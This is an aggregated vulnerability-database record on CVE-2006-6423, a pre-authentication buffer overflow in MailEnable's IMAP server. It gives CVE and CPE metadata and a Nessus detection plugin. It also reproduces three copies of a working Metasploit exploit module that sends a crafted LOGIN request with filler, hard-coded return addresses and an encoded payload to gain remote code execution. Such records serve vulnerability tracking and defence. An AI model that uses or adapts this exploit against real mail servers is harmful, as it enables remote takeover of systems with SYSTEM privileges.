ID OSVDB:32125Type osvdbReporter OSVDBModified 2006-12-08T08:48:50
Description
No description provided by the source
References:
Vendor Specific News/Changelog Entry: http://www.mailenable.com/hotfix/
Secunia Advisory ID:23201
Other Advisory URL: http://secunia.com/secunia_research/2006-73/advisory/
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0185.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0375.html
ISS X-Force ID: 30796
CVE-2006-6423
Bugtraq ID: 21492
{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.mailenable.com/hotfix/\n[Secunia Advisory ID:23201](https://secuniaresearch.flexerasoftware.com/advisories/23201/)\nOther Advisory URL: http://secunia.com/secunia_research/2006-73/advisory/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0185.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0375.html\nISS X-Force ID: 30796\n[CVE-2006-6423](https://vulners.com/cve/CVE-2006-6423)\nBugtraq ID: 21492\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:32125", "modified": "2006-12-08T08:48:50", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6423"]}, {"type": "exploitdb", "idList": ["EDB-ID:16475"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83125"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_LOGIN"]}, {"type": "nessus", "idList": ["MAILENABLE_ME_10025.NASL"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 6.5}, "id": "OSVDB:32125", "title": "MailEnable IMAP Service Pre-authentication Remote Overflow", "edition": 1, "published": "2006-12-08T08:48:50", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvelist": ["CVE-2006-6423"], "lastseen": "2017-04-28T13:20:28", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:26", "description": "Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.", "edition": 4, "cvss3": {}, "published": "2006-12-12T02:28:00", "title": "CVE-2006-6423", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6423"], "modified": "2018-10-17T21:48:00", "cpe": ["cpe:/a:mailenable:mailenable_enterprise:1.18", "cpe:/a:mailenable:mailenable_professional:1.84", "cpe:/a:mailenable:mailenable_enterprise:2.35", "cpe:/a:mailenable:mailenable_enterprise:1.30", "cpe:/a:mailenable:mailenable_enterprise:1.2", "cpe:/a:mailenable:mailenable_enterprise:1.12", "cpe:/a:mailenable:mailenable_enterprise:1.36", "cpe:/a:mailenable:mailenable_enterprise:1.24", "cpe:/a:mailenable:mailenable_enterprise:1.37", "cpe:/a:mailenable:mailenable_enterprise:1.17", "cpe:/a:mailenable:mailenable_enterprise:1.39", "cpe:/a:mailenable:mailenable_enterprise:1.16", "cpe:/a:mailenable:mailenable_enterprise:1.19", "cpe:/a:mailenable:mailenable_enterprise:1.33", "cpe:/a:mailenable:mailenable_enterprise:1.25", "cpe:/a:mailenable:mailenable_enterprise:1.32", "cpe:/a:mailenable:mailenable_enterprise:1.13", "cpe:/a:mailenable:mailenable_enterprise:1.27", "cpe:/a:mailenable:mailenable_enterprise:1.38", "cpe:/a:mailenable:mailenable_enterprise:1.35", "cpe:/a:mailenable:mailenable_enterprise:1.29", "cpe:/a:mailenable:mailenable_enterprise:1.41", "cpe:/a:mailenable:mailenable_enterprise:1.14", "cpe:/a:mailenable:mailenable_enterprise:1.31", "cpe:/a:mailenable:mailenable_enterprise:1.22", "cpe:/a:mailenable:mailenable_enterprise:1.15", "cpe:/a:mailenable:mailenable_enterprise:1.34", "cpe:/a:mailenable:mailenable_enterprise:1.11", "cpe:/a:mailenable:mailenable_enterprise:1.1", "cpe:/a:mailenable:mailenable_enterprise:1.23", "cpe:/a:mailenable:mailenable_enterprise:1.26", "cpe:/a:mailenable:mailenable_enterprise:1.28", "cpe:/a:mailenable:mailenable_enterprise:1.21", "cpe:/a:mailenable:mailenable_enterprise:1.40"], "id": "CVE-2006-6423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6423", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mailenable:mailenable_enterprise:1.33:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.24:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.27:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_professional:1.84:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.34:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.15:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:2.35:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.29:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.28:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.32:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.41:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.38:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.39:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.35:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.36:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.30:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.31:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.22:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.26:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.23:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.37:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.12:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mailenable:mailenable_enterprise:1.40:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:21:37", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "MailEnable IMAPD (2.35) Login Request Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6423"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83125", "href": "https://packetstormsecurity.com/files/83125/MailEnable-IMAPD-2.35-Login-Request-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow', \n'Description' => %q{ \nMailEnable's IMAP server contains a buffer overflow \nvulnerability in the Login command. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-6423'], \n[ 'OSVDB', '32125'], \n[ 'BID', '21492'], \n[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html'], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 450, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'MailEnable 2.35 Pro', { 'Ret' => 0x10049abb } ], #MEAISP.DLL \n], \n'DisclosureDate' => 'Dec 11 2006', \n'DefaultTarget' => 0)) \n \nregister_options( [ Opt::RPORT(143) ], self.class ) \nend \n \ndef exploit \nconnect \n \nauth = \"a001 LOGIN \" + rand_text_alpha_upper(4) + \" {10}\\r\\n\" \nsploit = rand_text_alpha_upper(556) + [target.ret].pack('V') \nsploit << payload.encoded + \"\\r\\n\\r\\n\" \n \nres = sock.recv(50) \nif ( res =~ / OK IMAP4rev1/) \nprint_status(\"Trying target #{target.name}...\") \nsock.put(auth) \nsock.get_once(-1, 3) \nsock.put(sploit) \nelse \nprint_status(\"Not running IMAP4rev1...\") \nend \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83125/mailenable_login.rb.txt"}], "metasploit": [{"lastseen": "2020-08-18T00:44:20", "description": "MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.\n", "published": "2006-12-11T19:21:17", "type": "metasploit", "title": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6423"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',\n 'Description' => %q{\n MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-6423'],\n [ 'OSVDB', '32125'],\n [ 'BID', '21492']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 450,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n\n [ \t'MailEnable 2.35 Pro',\n {\n 'Ret' => 0x10049abb,\n }\n ], #MEAISP.DLL\n\n [ \t'MailEnable 2.34 Pro',\n {\n 'Ret' => 0x76095d68,\n 'Offset' => 556,\n }\n ], #push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]\n ],\n 'DisclosureDate' => 'Dec 11 2006',\n 'DefaultTarget' => 0))\n\n register_options( [ Opt::RPORT(143) ])\n end\n\n def exploit\n connect\n\n auth\t= \"a001 LOGIN \" + rand_text_alpha_upper(4) + \" {10}\\r\\n\"\n sploit\t= rand_text_alpha_upper(556) + [target.ret].pack('V')\n sploit\t<< payload.encoded + \"\\r\\n\\r\\n\"\n\n res = sock.recv(50)\n if ( res =~ / OK IMAP4rev1/)\n print_status(\"Trying target #{target.name}...\")\n sock.put(auth)\n sock.get_once(-1, 3)\n sock.put(sploit)\n else\n print_status(\"Not running IMAP4rev1...\")\n end\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/mailenable_login.rb"}], "exploitdb": [{"lastseen": "2016-02-01T23:57:08", "description": "MailEnable IMAPD (2.35) Login Request Buffer Overflow. CVE-2006-6423. Remote exploit for windows platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "MailEnable IMAPD 2.35 Login Request Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6423"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16475", "href": "https://www.exploit-db.com/exploits/16475/", "sourceData": "##\r\n# $Id: mailenable_login.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\r\n\t\t\t\tvulnerability in the Login command.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-6423'],\r\n\t\t\t\t\t[ 'OSVDB', '32125'],\r\n\t\t\t\t\t[ 'BID', '21492'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 450,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'MailEnable 2.35 Pro', { 'Ret' => 0x10049abb } ], #MEAISP.DLL\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 11 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options( [ Opt::RPORT(143) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tauth\t= \"a001 LOGIN \" + rand_text_alpha_upper(4) + \" {10}\\r\\n\"\r\n\t\tsploit\t= rand_text_alpha_upper(556) + [target.ret].pack('V')\r\n\t\tsploit\t<< payload.encoded + \"\\r\\n\\r\\n\"\r\n\r\n\t\tres = sock.recv(50)\r\n\t\t\tif ( res =~ / OK IMAP4rev1/)\r\n\t\t\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t\t\tsock.put(auth)\r\n\t\t\t\tsock.get_once(-1, 3)\r\n\t\t\t\tsock.put(sploit)\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Not running IMAP4rev1...\")\r\n\t\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16475/"}], "nessus": [{"lastseen": "2021-04-01T03:58:32", "description": "The IMAP server bundled with the version of MailEnable installed on\nthe remote host reportedly is affected by multiple and as yet\nunspecified buffer overflows. \n\nNote that it is not currently known whether the issues listed in\nME-10023 and ME-10025 require authentication or not, but successful\nexploitation will allow an attacker to crash the service service or to\nexecute arbitrary code with LOCAL SYSTEM privileges.", "edition": 26, "published": "2006-12-10T00:00:00", "title": "MailEnable IMAP Server Multiple Buffer Overflow Vulnerabilities (ME-10025)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6484", "CVE-2006-6423"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mailenable:mailenable"], "id": "MAILENABLE_ME_10025.NASL", "href": "https://www.tenable.com/plugins/nessus/23783", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23783);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\"CVE-2006-6423\", \"CVE-2006-6484\");\n script_bugtraq_id(21492, 21493);\n\n script_name(english:\"MailEnable IMAP Server Multiple Buffer Overflow Vulnerabilities (ME-10025)\");\n script_summary(english:\"Checks version of MailEnable's MEIMAPS.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IMAP server is affected by multiple buffer overflows.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The IMAP server bundled with the version of MailEnable installed on\nthe remote host reportedly is affected by multiple and as yet\nunspecified buffer overflows. \n\nNote that it is not currently known whether the issues listed in\nME-10023 and ME-10025 require authentication or not, but successful\nexploitation will allow an attacker to crash the service service or to\nexecute arbitrary code with LOCAL SYSTEM privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mailenable.com/hotfix/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Hotfix ME-10025.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/12/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/12/08\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mailenable:mailenable\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mailenable_detect.nasl\");\n script_require_keys(\"SMB/MailEnable/Installed\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\n\n\nif (!get_kb_item(\"SMB/MailEnable/Installed\")) exit(0);\nif (get_kb_item(\"SMB/MailEnable/Standard\")) prod = \"Standard\";\nif (get_kb_item(\"SMB/MailEnable/Professional\")) prod = \"Professional\";\nelse if (get_kb_item(\"SMB/MailEnable/Enterprise\")) prod = \"Enterprise\";\n\n\n# Check version of MEIMAPS.exe.\nif (prod == \"Professional\" || prod == \"Enterprise\")\n{\n kb_base = \"SMB/MailEnable/\" + prod;\n ver = read_version_in_kb(kb_base+\"/MEIMAPS/Version\");\n if (isnull(ver)) exit(0);\n\n # nb: file version for MEIMAPS.exe from ME-10025 is 1.0.0.28.\n if (\n ver[0] == 0 ||\n (ver[0] == 1 && ver[1] == 0 && ver[2] == 0 && ver[3] < 28)\n )\n {\n # Let's make sure the product's version number agrees with what's reportedly affected.\n # nb: MailEnable version numbers are screwy!\n ver2 = get_kb_item(kb_base+\"/Version\");\n if (isnull(ver2)) exit(0);\n\n if (\n # 1.6-1.84 Professional Edition\n # 2.0-2.35 Professional Edition\n (prod == \"Professional\" && ver2 =~ \"^(1\\.([67]($|[0-9.])|8$|8[0-4])|2\\.([0-2]($|[0-9.])|3($|[0-5])))\") ||\n # 1.1-1.41 Enterprise Edition\n # 2.0-2.35 Enterprise Edition\n (prod == \"Enterprise\" && ver2 =~ \"^(1\\.([1-3]($|[0-9].)|4$|4[01])|2\\.([0-2]($|[0-9.])|3($|[0-5])))\")\n ) security_hole(get_kb_item(\"SMB/transport\"));\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
